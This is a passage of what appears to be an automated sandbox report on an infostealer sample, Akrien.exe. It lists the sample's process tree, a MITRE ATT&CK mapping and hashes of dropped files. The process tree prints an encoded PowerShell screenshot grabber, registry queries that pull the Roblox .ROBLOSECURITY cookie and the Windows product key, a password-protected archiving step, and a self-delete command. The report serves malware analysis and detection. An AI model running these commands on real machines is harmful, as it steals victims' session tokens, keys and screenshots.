cwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4944
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\egh5vwaw\egh5vwaw.cmdline"
        5⤵
        
        PID:1120
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD06.tmp" "c:\Users\Admin\AppData\Local\Temp\egh5vwaw\CSC64BE78E776E74DC79183AC1AC13728F.TMP"
        6⤵
        
        PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3316
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4796
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3660
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1504
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2776
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2796
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2720
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:492
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19762\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\5c3Am.zip" *"
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\_MEI19762\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI19762\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\5c3Am.zip" *
      4⤵
      Executes dropped EXE
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Akrien.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2332
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI19762\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\_bz2.pyd

Filesize
48KB

MD5
1d9398c54c80c0ef2f00a67fc7c9a401

SHA1
858880173905e571c81a4a62a398923483f98e70

SHA256
89006952bee2b38d1b5c54cc055d8868d06c43e94cd9d9e0d00a716c5f3856fa

SHA512
806300d5820206e8f80639ccb1fba685aafa66a9528416102aeb28421e77784939285a88a67fad01b818f817a91382145322f993d855211f10e7ba3f5563a596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\_ctypes.pyd

Filesize
59KB

MD5
2401460a376c597edce907f31ec67fbc

SHA1
7f723e755cb9bfeac79e3b49215dd41fdb5c2d90

SHA256
4f3f99b69834c43dac5c3f309cb0bd56c07e8c2ac555de4923fa2ddc27801960

SHA512
9e77d666c6b74cfb6287775333456cce43feb51ec39ad869c3350b1308e01ad9b9c476c8fa6251fe8ad4ab1175994902a4ad670493b95eb52adb3d4606c0b633

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\_decimal.pyd

Filesize
107KB

MD5
df361ea0c714b1a9d8cf9fcf6a907065

SHA1
102115ec2e550a8a8cad5949530cca9993250c76

SHA256
f78ee4524eb6e9885b9cbdb125b2f335864f51e9c36dc18fdccb5050926adffe

SHA512
b1259df9167f89f8df82bda1a21a26ee7eb4824b97791e7bbaa3e57b50ae60676762fd598c8576d4e6330ffaf12972a31db2f17b244c5301dcf29fe4abfba43f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\_hashlib.pyd

Filesize
35KB

MD5
d4c05f1c17ac3eb482b3d86399c9baae

SHA1
81b9a3dd8a5078c7696c90fbd4cf7e3762f479a5

SHA256
86bd72b13a47693e605a0de1112c9998d12e737644e7a101ac396d402e25cf2f

SHA512
f81379d81361365c63d45d56534c042d32ee52cad2c25607794fe90057dcdeeb2b3c1ff1d2162f9c1bdf72871f4da56e7c942b1c1ad829c89bf532fb3b04242e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\_lzma.pyd

Filesize
86KB

MD5
e0fa126b354b796f9735e07e306573e1

SHA1
18901ce5f9a1f6b158f27c4a3e31e183aa83251b

SHA256
e0dc01233b16318cd21ca13570b8fdf4808657ec7d0cc3e7656b09ccf563dc3e

SHA512
dd38100889c55bffc6c4b882658ecd68a79257bc1ffd10f0f46e13e79bff3fc0f908ae885cc4a5fed035bd399860b923c90ef75e203b076b14069bf87610f138

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\_queue.pyd

Filesize
26KB

MD5
84aa87c6dd11a474be70149614976b89

SHA1
c31f98ec19fc36713d1d7d077ad4176db351f370

SHA256
6066df940d183cf218a5053100e474d1f96be0a4e4ee7c09b31ea303ff56e21b

SHA512
11b9f8e39c14c17788cc8f1fddd458d70b5f9ef50a3bdb0966548ddcb077ff1bf8ca338b02e45ec0b2e97a5edbe39481dd0e734119bc1708def559a0508adc42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\_socket.pyd

Filesize
44KB

MD5
1d982f4d97ee5e5d4d89fe94b7841a43

SHA1
7f92fe214183a5c2a8979154ece86aad3c8120c6

SHA256
368cf569adc4b8d2c981274f22181fea6e7ce4fa09b3a5d883b0ff0ba825049d

SHA512
9ecdcf9b3e8dc7999d2fa8b3e3189f4b59ae3a088c4b92eaa79385ed412f3379ebe2f30245a95d158051dbd708a5c9941c150b9c3b480be7e1c2bba6dea5cb24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
a79b03ebe8c2bd17766865207159827c

SHA1
4c9c5c8b3ed747f1396c6e826828521a00b4eb0f

SHA256
ebe41406bc17b893df789586c44d364befba306c75da90f66d50a22fdc42b9a5

SHA512
42c51583a8993c46951969fce44ec9817cd8ed666f8b07ed39af16bbb9e001782d2422b47474add8b26abffe2dbb3b84c8a0453a10fdebcffd5759e7f45e95dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
e866ba19600cf3ba234a22134db6deb8

SHA1
216e1e38ea3c355db895c68802c8a81d3682c787

SHA256
42915a899478836d94d3df87d831658a02e5f859d8ef5345cc41d500024ff5a1

SHA512
f7a43bceb33befaca117579c5c3ea222c2c3e2561e9d4bb20791b0876a247e6edec10bdfc091887b3f0ace4012675f9b3693b9cb1b807085eef23c2858f79fec

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-debug-l1-1-0.dll

Filesize
22KB

MD5
92532aa68eec225b82f27e5e7ba98288

SHA1
61ec631941f83461bb2cdbd520d4845f80fde49e

SHA256
005080d48570d572de4e7ce77cbce7df7d7144193133661f168a62d106b12bca

SHA512
171512bab158b5f4a368856ee9119baaa19e48e864184d5e747b57f32069a763d3ae84b174987c3591fc3d708d1c5d3f5af3e8905594f2f17e034153d2428031

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
22KB

MD5
bcb422446a9f433f1079c422c367964e

SHA1
6de437a90da9f27db4ec904890c952dd7160441d

SHA256
0017c83e8aa6d06302c788eac705e9117188816be23eee9ba669ce19b03653cc

SHA512
b0117ff56c7cb6163f89505cf6fddd03fce45b3f321530c4285f48d37494afc15de09a7a4f934f809728a57f411da31be2f427b3cd6f91aedd998569d778bd76

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-fibers-l1-1-0.dll

Filesize
22KB

MD5
12bb7af644aa02c42d5056bd217734a2

SHA1
602580f6b633f2a6766c080c6489f262c105121b

SHA256
9804efe30ee64a6be9275aecd4159ac2e396e6f6754e1e9a9cdd32d98d186c59

SHA512
f9215b86d45ff541417127e7c3b0beb104e6ab5716933e9f6148929c6d736aa3e9f412e446b8e8a2bcb3f77314bd722e587e22fcaa7fa3f925596375621272e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
4f8d61a3843410cd0b8feb2f8d424fc6

SHA1
798fa86566cd9384f2a0c4994a2798730b253e8c

SHA256
0aac93d1cdedbdcd6b5f6da512d113b9f0100e94d449c6ed10e5f67bbe4ff0cf

SHA512
30b78e6cb47553b532c4d6f5ef5c0b18db5bfb7d45e9324d9eca3bc4b81a964e6836be6b00f7e63c1a9b01956defa7a1072bc019cc8fa838d6b4c44f3b099ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-file-l1-2-0.dll

Filesize
22KB

MD5
5c3cb67215c96d716266f7fc3e6ba874

SHA1
cb55971b992e0499263a3e40d9739ea5d3fa5003

SHA256
5889d4087643cabf4353bffad537faab3d9cee7adcc256341c39864255ef784f

SHA512
e091551c3e4e55686e16c054143f95b36625919ec4feb6f6b77a5762f48a230cbf28d876ce5ce7d804eb74efba38c290b2a8efdf6b2b9fc8e3974cec09d6b5b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-file-l2-1-0.dll

Filesize
22KB

MD5
96a6b34ccc5fc70028b5aae70c4b8c05

SHA1
f820b7d9a8e2202463b5d5b2144e9b24a39c730d

SHA256
26f91075d7d1b13c4dffab35a51441f3741d90cea88c41a1775508610b740719

SHA512
f098db40625bffd82479e47a0191aff7f79fd661b46b2228eaf4ec31c877ed25b333b8a21bcfc2a72bb76ec7b84443dc42c126974524aecc69bd4ea9ccb5aa3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-handle-l1-1-0.dll

Filesize
22KB

MD5
699a8b47690de2b0f76cd98199762f8f

SHA1
286f5cef8b504ebd27316110bde6d6ed012b1d6f

SHA256
cf7ee9eb315370dcaef8b38b458bcf856dc793ee4c4589d9a771b2ae6955a644

SHA512
b2a58faa54219139fa8e9b4d028b47b0119d6dde7f66605afc411c8026fd9cfee6028d98838b7c90ea12726cd789d1a42786e17f3399ffd169fb449d9697e2f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-heap-l1-1-0.dll

Filesize
22KB

MD5
2fd747ffcd94aab42c8d63902c40f4aa

SHA1
4df72b3ce15403c9233a0bf46ba2fbdd06eafef2

SHA256
0f587054e5ef8a34f5fed632b577dce8cdecc48ace83c8f50cebc6a7becd314c

SHA512
333f4fc8009571c16703383a920c17a222113c8b72206f21e02a3641506c65c8e2e60ba7dc7f0c27cb74069dd97706da8c14cec8ce6e15bc2d3a2d7c316d0b2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
6c292848984fd0f8f8de4b1482d6356c

SHA1
333121c4b9ad67dd70f9778d797ef74d64ce10b5

SHA256
efa284fe3e6323ad37d7a2751db92ed8245acc820030e7ed74865330cc312d8d

SHA512
5b4beaccf4fc09b0de4fd4c6d2a4f6d8d13adf7644c188479783a8936ea405c5ac5e32e607606b56108d430bd445bfa9c8d61ffe28bbf8e35b84ee79e27ea827

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
22KB

MD5
64e9a12135670e1365b1f6713d8c33b9

SHA1
74773b2a564e7813b4431b4a99b7f70d2db6f286

SHA256
72127cbb19728e81f39fd72a2186e08ea6cbe823275684e4ed5d45b46bfe04ef

SHA512
d47c4e86836acd334e1ef903f59d17fde14b7e7f04c809c2b0bf753d01c9182a285b014ba955ac6cd1754f65aae210e5c6d332bdc993b1f67f506b2201b8ee66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
2673f46e4954459b5a01154404fe8970

SHA1
1187f50c410bd3e3800242a17b915373eed7f89a

SHA256
b1b99194f2e95d7e6807db83967301da1338da9b0ac593214e845e137f84cd25

SHA512
67523210407601245764c8ea56d6304f9e55efda95aa97198fe9981312e3bd1310853985f97041dd491aa993254634c4f6921fc1145c8c2cc663522bf162f7fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
06152616b00e98cabae1f969584aac96

SHA1
a027392bb4aa019ab94b43a08cc9d74f62a421ad

SHA256
31e2706c35c6e5fe1c895e145dca536c9c9a417a3afdf3b2639ec6d7f4c6c4ae

SHA512
73264d57d019c67f8ebc566d79ce3baf68fc8ef6bf8420521307de280a0216678beb3b24b1408933e57bb7c29bc481ddf511f651a727e3ab682fff1e77f87a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
b7ed35512395d2964fe8bf8b8cfe40a2

SHA1
52706cc7ba9146df550ffc4ec64984eddf4b7bc9

SHA256
ea060506f1dabde5af452fca5d1e1623500824c96263d56fdd56e2365c2d0222

SHA512
64ac7ea4ec1a3c455e3a7898316220a1009bda63a5c5301f1f175a32981b6bec117157da412d7bde5fca678a8f6566b3be402fc1d61b4cd974af31be7532747e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
7a29cabbc7615542eced6b589774476d

SHA1
cb6474ee1513d0fbc242ef3ae0f2f3c376ebdb3f

SHA256
cfc737997d1252ca5e1214a52c971351b5e573d80fc0b144ca3380173035807a

SHA512
7a32fcd1030d504e1d4b070c515755876c3508e9196680192d9a6b2e8522d5f25c904a5ca83882bbfe62b27bd02db50edd25a6273e49039c32c36c9c00e9a409

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
49fe33e04a76c5b44c9f8c0ee2d5372a

SHA1
2dca9fb82bb182c12cdce1c6009bbb3a5c0ea56e

SHA256
8e46aecf93e399b97493ef1ab37f6ae8d88839860f412cc32404c76e2cbd93db

SHA512
420640ca3b382e422b5f9e9dc0930dae853bbae5fadf7d5c1cf40cea508b56710631410e6120c1930db0211e086e079c7c7a42ce95c654ce2b7e50711264949a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
22KB

MD5
548844894ca5a199e0a45b1ef346c4ad

SHA1
7867dd4f0786cb197c8b4f94767508c1210fdf17

SHA256
f5290377db93922ed117d0feffa03b81557e839d98e1d73b1d9344fbcf8563e1

SHA512
35905d2a7fd27ee5bf7cb6bcc63c9938ccc3d53b7c82b9734fdaa90e2612ac956f674f8cac2548d5fa8b9b686d53c96e31e02acca23f076c6c7135fd6f4c71b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19762\api-ms-win-core-profile-l1-1-0.dll

Filesize
22KB

MD5
3624a7b6daf99fc906a4cc84020a4744

SHA1
78fa84ddfe55022280003a8a9c156343cc5df5fc

SHA256
210f40fcd90b026b42dd9ace65a51349eb6c6150011b7ab8f9f7e41f80b45852

SHA512
1bc92596c3d16252fc13f69c1eb4641323e75f7859cc8ff882467583a74c3cdf5e954ac600215d7ec9ff811a446f954f44b5428778a1337384ee46fb849d4a28

Download Submit
